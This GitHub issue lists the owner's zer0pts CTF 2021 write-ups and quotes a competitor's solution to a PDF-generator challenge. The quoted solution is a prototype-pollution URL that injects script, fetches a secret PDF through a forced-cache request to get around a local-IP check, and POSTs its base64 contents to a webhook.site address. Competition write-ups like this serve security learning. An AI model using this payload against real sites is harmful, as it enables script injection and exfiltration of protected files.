Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

zer0pts CTF 2021 - Summary #24

Open
aszx87410 opened this issue Mar 7, 2021 · 2 comments
Open

zer0pts CTF 2021 - Summary #24

aszx87410 opened this issue Mar 7, 2021 · 2 comments

Comments

@aszx87410
Copy link
Owner

aszx87410 commented Mar 7, 2021
edited
Loading

Writeups

  1. zer0pts CTF 2021 - Simple Blog 23 solves
  2. zer0pts CTF 2021 - Kantan Calc 50 solves
  3. zer0pts CTF 2021 - PDF Generator(unintended) 18 solves
@aszx87410
Copy link
Owner Author

not pdf unintended from parrot

https://notpdfgen.ctf.zer0pts.com:8443/?sdf[constructor][prototype][title]=2&sdf[constructor][prototype][template][nodeType]=2&sdf[constructor][prototype][template][innerHTML]=<div id="app"><h3>{{title}}</h3><embed src="/9ab76d233b52165bf9450f81d0784425" type="application/pdf"><iframe srcdoc="<script>setTimeout(()=>{fetch('/9ab76d233b52165bf9450f81d0784425',{'cache':'force-cache'}).then((r)=>r.blob()).then((r)=>{
var reader = new FileReader();
 reader.readAsDataURL(r); 
 reader.onloadend = function() {
     var base64data = reader.result;                
     fetch(`https://webhook.site/QQ`,{method:`POST`,body:base64data});}
})},1000);</script>"></iframe></div>

use 'cache':'force-cache' to bypass local ip check, brilliant!

@aszx87410
Copy link
Owner Author

All official writeup: https://hackmd.io/@ptr-yudai/B1bk04fmu

# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@aszx87410